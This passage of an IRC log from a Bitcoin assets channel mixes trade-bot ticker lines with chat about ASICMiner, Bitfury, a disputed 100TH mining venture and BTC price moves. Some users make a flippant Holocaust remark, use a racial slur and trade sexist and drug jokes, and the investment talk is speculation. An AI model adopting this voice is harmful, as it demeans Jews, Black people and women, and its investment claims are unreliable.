2 @ 0.0183 = 0.0366 BTC [-] May 17 16:21:24 I have no idea May 17 16:21:27 I assum not May 17 16:21:50 I have some MPOE May 17 16:22:23 Yeah, I'd love to do that, MP, but seriously, I'm not a finance guy. I understand the math, but I'm more technical than would make me a financial person of any repoute. May 17 16:22:34 *repute May 17 16:22:36 hence the "anyone" :p May 17 16:23:03 i just repeat this periodically on the theory that hey, you never know. May 17 16:24:03 [HAVELOCK] [ASICM] 3 @ 0.01848 = 0.0554 BTC [+] May 17 16:24:14 [BTCTC] [ASICMINER-PT] 1 @ 1.86 BTC [+] May 17 16:24:21 [BTCTC] [B.YABMC] 1 @ 0.016132 BTC [-] May 17 16:24:23 [BTCTC] [ASICMINER-PT] 2 @ 1.8675 = 3.735 BTC [+] May 17 16:24:28 [BTCTC] [ASICMINER-PT] 2 @ 1.87 = 3.74 BTC [+] May 17 16:24:43 Exactly, but to get there, there needs to be a desire for professional information that is more visible. I'm testing the market with a new mining book in a few weeks (maybe a couple of months, depending on whether I move from Norway). Having some experience from publishing, I'd use that to understand the market and what people want. May 17 16:24:46 pigeons https://bitcointalk.org/index.php?topic=206003.0 you seen that ? May 17 16:24:57 furuknap usually markets need to be led. May 17 16:25:23 arrington didn't appear because there was a desire for tech crunch May 17 16:25:30 It does, but the leader also needs to know what people want. May 17 16:25:33 he made it and then there was suddenly a desire for it, five years down the line May 17 16:25:52 i don't think any leader of any import ever cares what epople want. at issue is what people need. May 17 16:25:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.0185 BTC [+] May 17 16:26:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.0185 = 0.185 BTC [+] May 17 16:26:15 what people want is too widely distributed and also quite likely to kill them. May 17 16:26:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.0185 = 0.037 BTC [+] May 17 16:26:33 OK, the leader (and that's not me, just so you don't think I'm blowing my own horn) needs to understand what people need. They usually say that by fierce opposition. May 17 16:26:46 [BTCTC] [TAT.ASICMINER] 8 @ 0.0185 = 0.148 BTC [+] May 17 16:26:51 [BTCTC] [TAT.ASICMINER] 23 @ 0.01852 = 0.426 BTC [+] May 17 16:26:54 indeed :) May 17 16:27:06 TAT: Are you listening? Now I'm having opinions not founded on math. May 17 16:27:19 best indication ever that auschwitz was a bad idea : the jews didn't fight back at all. May 17 16:27:47 Not the example I'd use, but I get your point :-) May 17 16:28:14 lol May 17 16:28:19 it's not the math that is the problem May 17 16:28:57 https://bitcointalk.org/index.php?topic=140366.msg2179249#msg2179249 lmao May 17 16:29:00 so wait, two weeks! May 17 16:29:25 What was their original deadline? Weren't the due for going online in June? May 17 16:29:53 picostocks ? May 17 16:29:57 maybe some psychosociologist figured two weeks is the best scam tolerance timeframe May 17 16:30:05 the story is that they had a 1mn ish investmenty with tom van ripyou of basic May 17 16:30:07 which poofed May 17 16:30:15 so then they made another 1mn ish investment with bitfury May 17 16:30:44 Yeah, I read up on the origonal 75TH mine, but I also got the impression that bitfury was more legit. May 17 16:30:44 while bitfury seems pretty certain he;ll deliver, i still very much doubt that investment exists. May 17 16:30:57 http://bitbet.us/bet/450/bitfurys-asic-will-work-with-power-1/ May 17 16:31:01 whoa the bet is about even now May 17 16:31:36 That would be fraud from two well known and public people. Do you think that's likely? May 17 16:31:50 picostocks is neither known nor public. May 17 16:31:58 his statements that he's invested with third parties are his own. May 17 16:32:21 No, but the people behind it are published in the business plan and seems reputable on brief research. May 17 16:32:35 i came with opposite results from the same research. May 17 16:33:35 maybe you didnt use enough math? May 17 16:33:58 Or maybe I used too much :-) May 17 16:34:02 i used a 1.5 math diode May 17 16:34:03 [HAVELOCK] [ASICM] 20 @ 0.01848 = 0.3696 BTC [+] May 17 16:34:07 :) May 17 16:34:14 furuknap but i mean, what exactly is your judgement there ? May 17 16:34:31 something like "here are names so it's legit" ? the pietila guy also throws names around May 17 16:35:00 On 100th? Not sure. It looks a bit too good to be true. May 17 16:35:37 Is there any evidence from any unproven ASIC provider that shows any reason to assume it's a lie til it ships? May 17 16:35:52 not a lie* May 17 16:36:38 even the ones that ship rarely really do May 17 16:36:45 ThickAsThieves well, i count the 100 btc of bitfury's as some evidence May 17 16:36:49 I think the entire community is skeptical due to some key providers being late and scams. AM showed it's possible. The swedes work with very reputable companies. 100TH certainly has put a lot of effort into what at the time seemed like a peanut reward. May 17 16:37:16 furuknap where's the effort ? May 17 16:37:27 the bet is an odd way to prove yoursel May 17 16:37:28 d May 17 16:37:29 f May 17 16:37:48 maybe it's a ploy May 17 16:38:03 The business plan, the picostocks setup, the putting your name on the line. At the time, there weren't asking for much. It's become a lot since then, but at the time, I mean, if you wanted to scam someone, at least you should do it big. May 17 16:38:54 If the bet is proof, why not 500btc? May 17 16:39:00 Provided the people behind it really are the people in the business plan, they seem like smart enough people that if they wanted, they would scam someone for far more money. May 17 16:40:18 Faking a couple of results from their bio work would probably yields orders of magnitude more reward. They're putting their own names on the line so they'll have to disappear anyway, so why not scam for $50million instead? May 17 16:41:31 or maybe the bet is just mp trollin' May 17 16:42:03 [HAVELOCK] [ASICM] 90 @ 0.01848 = 1.6632 BTC [+] May 17 16:42:27 Well, I doubt he'd risk his name and reputation for a few million either... May 17 16:45:20 people who run ponzi schemes basically scam, trash their name and reputation, etc, for usually $0 May 17 16:45:52 Yeah, but if you were doing that, would you rather have $5M or $500M? May 17 16:46:01 if he was a scammer he would do it for more money is not an effective heuristic May 17 16:46:34 [BTCTC] [TAT.ASICMINER] 11 @ 0.01852 = 0.2037 BTC [+] May 17 16:47:02 Maybe. On the other hand, they could also easily have scammed anonymously and not have the burden of tainting their names. May 17 16:47:41 "if he was scamming, he wouldn't use his real identity" is not an effective heuristic May 17 16:48:15 trendon shavers, bernie madoff, May 17 16:48:39 Yeah, but Madoff scammed for bilions. May 17 16:49:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.01852 = 0.037 BTC [+] May 17 16:50:08 trendon and madoff and the rest scammed for enough to pay old investors and enough to eat May 17 16:50:14 ThickAsThieves but if it's a ploy it'll be expensive. May 17 16:50:28 Deson't matter if they care for it. They could have done it without. IF (and I capitalized that intentionally) the people in tne BP are the real people and not just a Google image search, what possible reason could they have for adding their names when they don't have to? May 17 16:50:41 if betting goes his way it won't be expensive May 17 16:50:53 and he can always bet the other side May 17 16:50:56 furuknap i have yet to see a pgp signed declaration from any of these people. May 17 16:51:30 ThickAsThieves even if he bets the other side. May 17 16:51:38 MP: True, but the BP is also denominated in USD, not BTC, so they seem to be targeting people outside the community who may not be aware of the tradition of PGP signed stuff. May 17 16:51:47 he has 100 btc on the line. if he puts 1000 on the other side to make back his 100 he still pays the rake May 17 16:52:05 furuknap or who may be naive of exactly how scam friendly bntc is May 17 16:53:20 Again, it seems way too much effort for essentially peanuts. I don't know. Might throw a few coins there to see if it sticks. May 17 16:53:34 you May 17 16:53:43 there are pages of debate today on bitcointalk about how this site that you pay .25 btc for him to mine .3 btc for you on his nvidias cant be a scam because people have been getting paid May 17 16:53:53 're new. pigeons has been here through the scams. when he says "not an effectual heuristic" he is speaking from a place of pain. May 17 16:54:34 I understand that, and I eat so much salt these days, I'll be a mummy by the end of the summer. This doesn't smell right though (and right here would be scam). May 17 16:55:17 Not saying it smells roses either, just to be clear on that. May 17 16:57:20 i haven't even looked into whatever you're talking about. I just saw "if he was scamming he would do it for more money and why would he use his real name" May 17 16:57:35 and if you're even making those points, something is wrong May 17 16:57:47 Of course IF (again intentionally) this is legit AND they deliver within a reasonable time frame, the proposition is a gold mine, perhaps more so than AM even. May 17 16:58:39 ... May 17 16:59:23 Actually, I wasn't trying to make a point of it, I was just responding to a question about what I thought of the project. From the projects I have evaluated, those were distinguishing characteristics in addition to a growing confidence that such a delivery is technically feasible. Two months ago, I probably wouldn't have given it a second glance. May 17 16:59:47 *distringuishing characteristics of the _business plan_ May 17 16:59:56 bah, where' s the spell checker. May 17 17:03:16 I need to fix dinner... May 17 17:04:04 [HAVELOCK] [SDICE] 5 @ 0.2109 = 1.0545 BTC [+] May 17 17:05:10 Raindeer meatballs. May 17 17:09:48 wait, you're a girl !? May 17 17:11:34 [BTCTC] [TAT.ASICMINER] 14 @ 0.01852 = 0.2593 BTC [+] May 17 17:12:03 [HAVELOCK] [KCIM] 2 @ 1.0811 = 2.1622 BTC [-] May 17 17:12:46 [BTCTC] [TAT.ASICMINER] 60 @ 0.018521 = 1.1113 BTC [+] May 17 17:13:13 [BTCTC] [COGNITIVE] 1 @ 0.228999 BTC [+] May 17 17:17:19 [MPEX] [S.BBET] 1500 @ 0.00159999 = 2.4 BTC [+] May 17 17:24:35 I'm not a girl if you were asking me... May 17 17:24:42 a ok. balance is preserved. May 17 17:25:39 [BTCTC] [ASICMINER-PT] 2 @ 1.87 = 3.74 BTC [+] May 17 17:27:55 [BTCTC] [ASICMINER-PT] 1 @ 1.87495 BTC [+] May 17 17:28:02 [HAVELOCK] [SDICE] 1 @ 0.211 BTC [+] May 17 17:28:35 truffles you're clearly ruining our sausagefest in here, at least pretend to own a johnson. May 17 17:29:44 [BTCTC] [ASICMINER-PT] 1 @ 1.87495 BTC [+] May 17 17:31:04 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 17 17:32:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.018521 = 0.0926 BTC [+] May 17 17:33:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.018521 = 0.0556 BTC [+] May 17 17:34:12 [BTCTC] [TAT.ASICMINER] 24 @ 0.018521 = 0.4445 BTC [+] May 17 17:34:14 [BTCTC] [B.YABMC] 98 @ 0.01674 = 1.6405 BTC [+] May 17 17:34:16 lol sexist May 17 17:34:20 [BTCTC] [B.YABMC] 2 @ 0.017 = 0.034 BTC [+] May 17 17:35:12 [BTCTC] [ASICMINER-PT] 1 @ 1.8422 BTC [-] May 17 17:35:19 [BTCTC] [ASICMINER-PT] 5 @ 1.842 = 9.21 BTC [-] May 17 17:36:33 That price is too high.. May 17 17:38:39 That's what I keep saying... May 17 17:42:45 [BTCTC] [ASICMINER-PT] 1 @ 1.8452 BTC [+] May 17 17:42:50 [BTCTC] [ASICMINER-PT] 8 @ 1.845 = 14.76 BTC [-] May 17 17:43:55 I like how everyone is thanking Friedcat for paying high divs as a strategy May 17 17:44:10 I like the divs n all, and I do think AM can grow further May 17 17:44:22 but it's not exactly a strategy to payout all the monies May 17 17:44:39 Friedcat should start developping a second chip May 17 17:44:44 he is May 17 17:44:45 one on the smallest process May 17 17:45:02 What is it, like 10-15nm? May 17 17:45:09 "About the argument of dividend payments, our view is that we will distribute the net income after necessary costs are excluded and funds for foreseeable future (expansion, gen-2 chips) are reserved." May 17 17:45:13 he doesnt say May 17 17:45:32 I think what it is May 17 17:45:43 is that AM makes so much money from the shares they already hold May 17 17:46:02 paying out high divs is enough May 17 17:46:12 and still leaves plent mmoney for reinvestment May 17 17:46:17 plenty* May 17 17:46:27 he has already been reserving some for a while May 17 17:46:31 and pays his bills early May 17 17:47:27 he did make it clear that new ventures, unrelated to mining, would not be wrapped under the current asset May 17 17:47:39 but that he is dedicated to AM first and foremost May 17 17:47:48 until it can run with "less founder involvement" May 17 17:52:03 [HAVELOCK] [ASICM] 63 @ 0.018478 = 1.1641 BTC [-] May 17 17:53:51 Namworld: So far, the Swedes are the ones that attempts the smallest process of 28nm. Current AM is 130nm. It will take a long time to get smaller process right, as I understand it. May 17 17:54:05 [BTCTC] [ASICMINER-PT] 1 @ 1.87495 BTC [+] May 17 17:55:37 [HAVELOCK] [ASICM] 634 @ 0.018478 = 11.7151 BTC [-] May 17 17:56:06 truffles, I think of #assets as more of a pulse than a clique, it's a good place to cut through the bitcoin FUD as it floods up to our necks. May 17 17:56:17 stay here, stay close to the pulse of bitcoin. May 17 17:56:42 yes May 17 17:56:51 nerve center of bitcoin world May 17 17:56:53 did I ignore truffles by mistake or something? May 17 17:57:00 you're replying to "[10:44] dont like monies now?"? May 17 17:57:26 oh i see it now May 17 17:57:29 nvm May 17 17:58:24 i was in a meeting, way behind. ;) May 17 17:59:02 lol May 17 17:59:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.018521 = 0.0556 BTC [+] May 17 18:00:03 [HAVELOCK] [ASICM] 54 @ 0.01849555 = 0.9988 BTC [+] May 17 18:00:13 [MPEX] [S.MPOE] 2100 @ 0.00067238 = 1.412 BTC [+] May 17 18:03:03 [HAVELOCK] [HIM] 9 @ 1.9 = 17.1 BTC [-] May 17 18:04:06 zup pervz, what imiss? May 17 18:04:50 btc is full of drama, hardly 1 week goes by with no drama May 17 18:04:55 btc is sooo much better than hollywood May 17 18:05:29 damn you must love the forums May 17 18:06:52 forums haz some lulz May 17 18:07:59 the spamcoin nonsense has lowered the bar, which is hard for the forums. May 17 18:09:37 way too much noise on forums for my tastes, though May 17 18:09:47 [BTCTC] [TAT.ASICMINER] 11 @ 0.018521 = 0.2037 BTC [+] May 17 18:10:06 i find that I mostly rely on links posted here for especially juicy stuff May 17 18:10:09 me too, but there are some nuggets down there. May 17 18:10:22 gotta mine the bitcoin, gotta mine the forums, gotta mine the IRC. May 17 18:10:33 indeed! May 17 18:11:01 truffles: you want drama? https://bitcointalk.org/index.php?topic=174620.msg2179552#msg2179552 May 17 18:11:03 I liked numismatics write of the whole deal May 17 18:11:31 optimator, have you drunk the spaten optimator? May 17 18:11:38 yumm May 17 18:11:53 :) i know. miss it. May 17 18:12:20 he is. May 17 18:12:52 agreed. May 17 18:13:28 deadweasel: you can't get it where you are? May 17 18:13:34 it sure seems like there is a correlation between the loudest BTC voices the most mentally unstable. May 17 18:13:57 i think yes May 17 18:14:07 and being one of the more loud i would say yeah May 17 18:14:07 optimator: I have gluten intolerance/yeast issues, so I had to give up bier 5 years back. May 17 18:14:11 i think rpietilia nailed it with the word manic May 17 18:14:20 [BTCTC] [PAJKA.BOND] 10 @ 0.1048 = 1.048 BTC [+] May 17 18:14:33 [BTCTC] [PAJKA.BOND] 2 @ 0.1049 = 0.2098 BTC [+] May 17 18:14:41 don't say that, truffles takes offense to 'manic'. ;) May 17 18:14:53 deadweasel: i just tried a sorghum beer - not bad May 17 18:15:22 Red Bridge is good, but i LOVE Greens, they make nice bier for us gluten pansies. May 17 18:15:30 beer can be made from anything, and if it is cared for and done well, it will be good:) May 17 18:15:46 way too much $$, and the yeast still gets me, so I stick to scotch and wine. May 17 18:16:03 but your nick brought back happy optimator memories May 17 18:16:09 that i'd since forgotten May 17 18:16:09 :) May 17 18:16:54 you know normal people don't change the world May 17 18:17:42 Anyone know how many shares the 100TH people sold in the IPO? May 17 18:17:48 you dont need to change the world to win, but it can help :) May 17 18:18:01 100Th people? May 17 18:18:04 [HAVELOCK] [ASICM] 96 @ 0.01849555 = 1.7756 BTC [+] May 17 18:18:20 The people behind the 100TH project then... May 17 18:18:23 Chaang-Noi: some new mining scam, probably. May 17 18:18:35 :-) May 17 18:18:53 i know of most legit things before they happen May 17 18:18:59 iv never heard of this May 17 18:19:11 Bitfury? May 17 18:19:24 oh bitfurry? May 17 18:19:33 Heh, yeah... May 17 18:19:34 i don't think picostocks and bitfury are actually related May 17 18:19:35 dhs raids? May 17 18:19:43 other than the former's claims to investment in the later. May 17 18:20:07 what are they going to raid? the block chain? May 17 18:20:24 From what I understand, the birst Bitfury batch is 200 TH, of which 100TH goes to the mine, 50 TH to Bitfury, and the rest to undisclosed private investors. May 17 18:20:30 nall the can do is lock up some fiat, who gives a fuck May 17 18:20:45 I just wanted to know how many IPO shares they sold so I could put it into a model to see if it's profitable. May 17 18:20:54 i dont know, sorry May 17 18:21:04 here's a nice read http://hplusmagazine.com/2013/05/02/the-ones-who-change-the-world/ May 17 18:21:07 < Chaang-Noi> what are they going to raid? the block chain? May 17 18:21:09 awesome May 17 18:21:17 is deepbit behind bitfurry? May 17 18:21:19 i ride the blockchain baby May 17 18:21:23 Chaang-Noi nope. May 17 18:22:16 [MPEX] [S.MPOE] 4165 @ 0.00067238 = 2.8005 BTC [+] May 17 18:22:16 dont know enoghh about bitfurry :/ but sounds risky May 17 18:22:38 Hehe, you deduce that from the name? May 17 18:22:50 i think its bitfury May 17 18:23:03 from the lack of people who i knew that invested in it or think its a good idea May 17 18:23:22 is bitfury fpga? or asic? May 17 18:23:24 bitfury is a better name than bitfurry :) May 17 18:23:34 It is bitfury. So far as I've researched now, and excuse my noobishness if this is obvious, he's a Russian guy that had some incredible talent with FPGAs and then went on to design ASICs. May 17 18:23:36 they seems to be asic if its 100th May 17 18:24:04 [HAVELOCK] [ASICM] 754 @ 0.01849555 = 13.9456 BTC [+] May 17 18:24:08 however if they claimed to get 100th with fpga and they sold stock on it, epic troll:) May 17 18:24:15 I've only seen him post in Russian, thought, and my Russian is a bit rusty. May 17 18:24:20 id give them props for that May 17 18:24:28 [BTCTC] [TAT.ASICMINER] 100 @ 0.018521 = 1.8521 BTC [+] May 17 18:24:28 No, they're slling it as ASICs. May 17 18:24:29 afaik he/they are russian May 17 18:24:35 my russian is a bit fury May 17 18:24:44 optimator made a fpga last year, now claims an asic May 17 18:25:16 still, only chinese have made an asic, (other than bfls 5ghs) May 17 18:25:25 the 10 or so prototypes May 17 18:25:41 well, so maybe the russians did too. May 17 18:25:49 he claims to have it now? May 17 18:26:16 and if made in russia ill be impressed May 17 18:26:19 They claim the wafers are done and ready tro be bumped and packaged, yes. Expected delivery in two weeks. May 17 18:26:30 oh, interesting May 17 18:26:37 Doesn't have to be made in Russia even if Bitfury is Russian. The 100TH people are from Poland. May 17 18:26:42 well, i guess we will see May 17 18:26:47 http://bitbet.us/bet/450/bitfurys-asic-will-work-with-power-1/ May 17 18:26:53 2 weeks- does everything in the chip world in two weeks? May 17 18:26:53 [BTCTC] [TAT.ASICMINER] 94 @ 0.018521 = 1.741 BTC [+] May 17 18:27:00 there, he put a 100 btc on the theory that he shows working asic doing < 1watt per ghs May 17 18:27:06 droped a word - happen May 17 18:27:06 ie, much better than asicminers' May 17 18:27:25 furuknap the 100th people are claioming to have bought his stuff. May 17 18:27:35 Yeah, about 8 times 'better' than AM chips first gen. May 17 18:27:53 Yeah, I'll see if I can find the reference, I have about 28 tabs up right now. May 17 18:27:55 he also claims that 22 peta hash is doable in one run May 17 18:28:10 which is a lot better than asicminer too, seeing how they still don't have the 12th promised for feb/march May 17 18:28:15 but hey. claims are cheap. May 17 18:28:15 That's in chip production. 22 peta isn't exactly deliverable :-) May 17 18:28:28 AM has far more than 12 TH now. May 17 18:28:38 o it does ? May 17 18:28:43 AM is having problems now with not enough places to run their stuff, they have it, just no internet/electric May 17 18:28:48 where was that ThickAsThieves link May 17 18:28:51 I think they're either pushing or have poassed 20 THs. May 17 18:28:54 mp, AM has been over 20th for a while May 17 18:29:09 www.asicminercharts.com May 17 18:29:17 They were scheduled to veliver 3-10 TH per week over the past two weeks. May 17 18:29:21 *deliver May 17 18:29:26 a ok there it is. May 17 18:29:38 happened coupla weeks ago May 17 18:29:39 they also just sold a shit load of units cuz, people paid crazy prices for them May 17 18:30:08 It's been flat for about a week, though, and I think I read they had problems finding stable space, although that might be earlier. May 17 18:30:24 they have the hardware just not the space May 17 18:30:34 that is why they are focusing on selling and making the usb units now May 17 18:30:43 and at 2 btc each, why the hell not :) May 17 18:31:07 indeed. May 17 18:31:22 Yeah, but they need to sell a hell-uva-lot of them and so far the only order I've seen is a few hundred from a US group buy. May 17 18:31:23 good move to sell as many as they can at that price. May 17 18:31:38 10,000 is there run this time around May 17 18:32:02 there are about 10 group buys and some people getting more than 300 May 17 18:32:07 easy 5,000 alreasy sold May 17 18:32:14 The European group buy got mad attention after a /. post, selling around 800 in a day. May 17 18:32:55 tehy will sell all 10,000 units May 17 18:33:37 i dont like that he made the blade sales private May 17 18:33:54 what do you mean? May 17 18:33:59 it was a public auction? May 17 18:34:00 he has an open thread up May 17 18:34:01 I agree, but I'm sure hell post sales numbers after a while. May 17 18:34:11 basically you email him how many you want May 17 18:34:17 made to order May 17 18:34:18 oh May 17 18:34:22 Chaang: yeah, but not there's a retail thread with "mail me to buy" stuff. May 17 18:34:28 hmm May 17 18:34:34 *now May 17 18:34:35 [MPEX] [S.MPOE] 14291 @ 0.00067238 = 9.609 BTC [+] May 17 18:34:42 well honestly at this point, we just have to trust friedat May 17 18:34:51 obv May 17 18:35:03 transparency is much nicer tho May 17 18:35:10 agree May 17 18:35:18 but even so, we never were going to get 100% like we all want May 17 18:35:23 not taht people werent already emailing him for deals May 17 18:35:34 we have no idea how much he is paying for labor, equipment and the like May 17 18:35:45 people were e-mailing me for deals! May 17 18:35:46 I trust his honesty. A bit skeptical about business abilities. May 17 18:36:03 furuknap he's operationally good, or at least way better than everyone else in btc May 17 18:36:15 financially clueless, but that;'s not exactly a crime, few op managers grok finance. May 17 18:36:35 mp, absolutely, which is why I have faitrh in the operation if they can calm down a bit. May 17 18:36:43 anyone who can get 255 of the network is going to lack in some areas May 17 18:36:47 25% May 17 18:36:54 well they've created a few problems for themselves with the horde of clueless investors, but anyway. May 17 18:37:19 in other news : https://twitter.com/Mircea_Popescu/status/335417437388435457 May 17 18:37:41 i was clueless when i bought in, i only did it cuz of my past relatioship with him and he seemed like an honest guy. i had no idea how he expected to beat bfl May 17 18:37:57 lol, mp May 17 18:38:09 need meme of pope dove and spray of bitcoins May 17 18:38:25 Problem is, if or when there comes a correction, those clueless investors will cry 'bubble share' whenever they can, tainting AMs ability to appeal to serious investors. May 17 18:39:49 this also depends on how aggressive board seat holders wanna be May 17 18:39:58 they are the ones with the selling power May 17 18:41:16 totally. May 17 18:42:56 BTW, mp, -PR seems a bit skeptical about the whole 100TH thing. You probably read it already: https://bitcointalk.org/index.php?topic=140366.msg1495160#msg1495160 May 17 18:43:05 http://i.imgur.com/VEKzIOY.jpg May 17 18:43:13 Pretty sure that's called thievery May 17 18:43:16 [BTCTC] [ASICMINER-PT] 1 @ 1.8749 BTC [-] May 17 18:43:18 she thinks AM is a scam too May 17 18:43:24 Sure, I bet the power companies hate it. May 17 18:44:31 i do think i looked into this before, i did not like what i saw May 17 18:44:38 pico stocks May 17 18:44:46 bitfury May 17 18:45:05 wonder what will happen.. even if legit, could run into same issues as bfl and the chips just dont work May 17 18:45:29 That's always a risk. Same can apply to AM 2nd gen. May 17 18:45:41 Or the Swedes. May 17 18:45:59 i kinda thought friedcat was smart going with the very very old tech May 17 18:46:24 and yes the second gen could fail, but AM has so massive deep pockets and the right contacts at this point May 17 18:46:39 Yeah, that was genious, and I mean that. Realizing how complex it would be, he got an old beat-down horse and bet that there wouldn't be any other horses in the race. May 17 18:46:59 He was right, and we've been bathing in gold ever since. May 17 18:49:28 The drawback of that strategy is that he still needs to get a proper racehorse at some point, and the process isn't going to be quicker for him. People think he can just snap his fingers and have 262 TH in production, but with the current tech, that takes a lot of space and he's already running into issues with that. May 17 18:52:40 [BTCTC] [ASICMINER-PT] 1 @ 1.8748 BTC [-] May 17 18:55:03 [BTCTC] [ASICMINER-PT] 1 @ 1.8748 BTC [-] May 17 18:55:29 Here's Bitfury with some more technical details on his chip, in the 100TH thread. MP, I doubt he would post there so casually if he had no relationship with 100TH. https://bitcointalk.org/index.php?topic=140366.msg1509922#msg1509922 May 17 18:56:54 i don't credit such implications at all. May 17 18:57:35 Ah, I thought you meant something along those lines. I thought you said the only relationship was that 100TH claimed to have purchased Bitfury chips. May 17 18:57:49 My bad if that wasn't your intention. May 17 19:00:41 [BTCTC] [TAT.ASICMINER] 48 @ 0.01863 = 0.8942 BTC [+] May 17 19:01:28 119.9 again.. we cant get higher than that... May 17 19:05:56 [BTCTC] [TAT.ASICMINER] 52 @ 0.01863 = 0.9688 BTC [+] May 17 19:05:57 furuknap is what i meant. some guy "posting casually" in some forum thread is no argument for anything May 17 19:06:04 [MPEX] [S.MPOE] 2350 @ 0.00066723 = 1.568 BTC [-] May 17 19:06:07 Chopard jewels worth more than $1 million have been stolen at the Cannes film festival May 17 19:06:38 bitcoin wearers unaffected. May 17 19:06:50 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [-] May 17 19:07:09 crash! May 17 19:07:17 Ah, OK. Well, the more I read, the more it seems that there's just way too much effort here to scam someone for peanuts. May 17 19:07:26 1.4? lol May 17 19:07:28 I bet an otion exercise :-) May 17 19:07:32 yeah May 17 19:07:32 *option May 17 19:07:32 :) May 17 19:07:35 has to be May 17 19:08:15 bitcoin wearers unaffected. im going to make a necklace out of a casasicus 1000 gold coin May 17 19:08:46 lol May 17 19:09:04 [HAVELOCK] [SDICE] 1 @ 0.217 BTC [+] May 17 19:09:14 fuck see that buy wall at 118??? May 17 19:09:20 if real we are going upppppppp May 17 19:09:26 on a friday May 17 19:10:29 Wall at 118? I see 750 there if you're talking Gox? May 17 19:10:42 i see over 9000 May 17 19:10:56 ;; bids 118 May 17 19:11:02 There are currently 10058.458 bitcoins demanded at or over 118.0 USD, worth 1187353.50463 USD in total. | Data vintage: 0.0059 seconds May 17 19:11:10 yes that is over 9000 May 17 19:11:17 [BTCTC] [ASICMINER-PT] 2 @ 1.8425 = 3.685 BTC [+] May 17 19:11:18 Hm... Reloading Clark... May 17 19:11:31 Ah, now it's there... May 17 19:11:50 [BTCTC] [ASICMINER-PT] 1 @ 1.8402 BTC [-] May 17 19:11:55 [BTCTC] [ASICMINER-PT] 1 @ 1.8402 BTC [-] May 17 19:12:09 [BTCTC] [ASICMINER-PT] 1 @ 1.8401 BTC [-] May 17 19:12:24 [BTCTC] [ASICMINER-PT] 1 @ 1.835201 BTC [-] May 17 19:12:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.01865 = 0.0933 BTC [+] May 17 19:12:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.01865 BTC [+] May 17 19:13:12 http://video.cnbc.com/gallery/?play=1&video=3000169018 May 17 19:13:21 This is the Battle of the $120. 10K sell before 122 too. May 17 19:14:20 1000 just bought at 19.9 May 17 19:15:05 almost May 17 19:15:12 119.97 May 17 19:15:24 Everything seems to point to 120+ shortly. Sadly, I chickened out on the Dwolla dip by not buying. I believe I will be hitting myself on the head for that. May 17 19:15:55 119.98 May 17 19:16:07 Another 100. May 17 19:17:02 1K more! May 17 19:17:17 Just a couple hundred left. May 17 19:17:21 120 May 17 19:17:23 There we are! May 17 19:17:34 we got to get over the wall however May 17 19:17:50 Yeah, but it's falling fast. May 17 19:18:03 1K left. May 17 19:18:06 900 May 17 19:18:07 800 May 17 19:18:09 600 May 17 19:18:10 [MPEX] [S.MPOE] 250 @ 0.00066723 = 0.1668 BTC [-] May 17 19:18:11 Damn! May 17 19:18:21 400 May 17 19:18:23 200 May 17 19:18:24 100 May 17 19:18:32 Gone! May 17 19:18:39 :) May 17 19:18:43 AAAND IT'S GONE May 17 19:19:02 BUY, BUY, BUY! May 17 19:19:22 121 May 17 19:20:15 Holy moses... May 17 19:20:29 ? May 17 19:20:34 its a break out May 17 19:20:39 now we need to see about 125 May 17 19:20:42 cuz if we do 125!!!! May 17 19:21:08 ...then you sell out and buy a mountain of cocaine? May 17 19:21:42 LIMIT BREAK May 17 19:21:44 iv already done that May 17 19:21:49 Too much pressure... May 17 19:22:15 i dont need more hookers and coke money May 17 19:22:22 anyway off for a beer bbl May 17 19:23:36 [MPEX] [S.MPOE] 10900 @ 0.00067238 = 7.3289 BTC [+] May 17 19:30:08 Hi! May 17 19:39:50 Gribble? GRIBBLE! Noooooo! May 17 19:41:04 [HAVELOCK] [ASICM] 2 @ 0.01825 = 0.0365 BTC [-] May 17 19:41:05 [HAVELOCK] [ASICM] 225 @ 0.01820001 = 4.095 BTC [-] May 17 19:41:08 To answer my own question from earlier (https://bitcointalk.org/index.php?topic=140366.msg1531597#msg1531597): [L]ooks like they sold 518271 shares. IPO is now closed. May 17 19:41:24 don't do cocaine May 17 19:41:32 MORE THAN ONCE A YEAR May 17 19:41:38 :D May 17 19:48:38 [BTCTC] [COGNITIVE] 1 @ 0.229 BTC [+] May 17 19:49:59 MP, any way to reach you in private? May 17 19:51:47 [BTCTC] [ASICMINER-PT] 1 @ 1.871 BTC [+] May 17 19:52:57 furuknap /query mircea_popescu May 17 19:53:47 davout : the girl wants you to know that she's answered "spoken like a true gypsy" in the nigger thread but some mod beleeted it. May 17 19:53:54 now im doing pr for my pr ;/ May 17 19:54:19 i warned you about here May 17 19:54:23 her* May 17 19:54:53 [BTCTC] [TAT.ASICMINER] 51 @ 0.01849 = 0.943 BTC [-] May 17 19:55:37 mircea_popescu: hah May 17 19:56:22 mircea_popescu: we shall have a concert for the conference #2 May 17 19:56:37 lol kickass May 17 19:56:41 o, you registered yet ? May 17 19:57:13 no May 17 19:57:44 the fee for the music shall be equal to the fee for VIP registration May 17 19:57:46 xD May 17 19:57:59 yeah but the music is paid after :D May 17 19:58:07 choo choo mother fucker! May 17 20:01:48 [BTCTC] [ASICMINER-PT] 1 @ 1.872 BTC [+] May 17 20:02:22 mircea_popescu: you got me there! May 17 20:02:38 mircea_popescu: pay me in alcohol and romanian women May 17 20:02:45 getting people there since 1993 May 17 20:03:04 [HAVELOCK] [VTX] 1 @ 0.4299 BTC [-] May 17 20:06:03 [HAVELOCK] [ASICM] 49 @ 0.0184 = 0.9016 BTC [+] May 17 20:06:05 [HAVELOCK] [ASICM] 500 @ 0.0183 = 9.15 BTC [-] May 17 20:06:32 someone is trying to sell me http://www.zeroblock.com/ May 17 20:07:03 omg May 17 20:07:04 [BTCTC] [ASICMINER-PT] 1 @ 1.83 BTC [-] May 17 20:07:05 >>Fucking Awesome. May 17 20:07:05 You feel like a hacker and shit. May 17 20:07:07 -- May 17 20:07:09 O_o May 17 20:07:34 i dont see no skateboard May 17 20:09:03 [HAVELOCK] [ASICM] 108 @ 0.0183 = 1.9764 BTC [-] May 17 20:10:00 >We will be launching a product with consolidated, real-time, 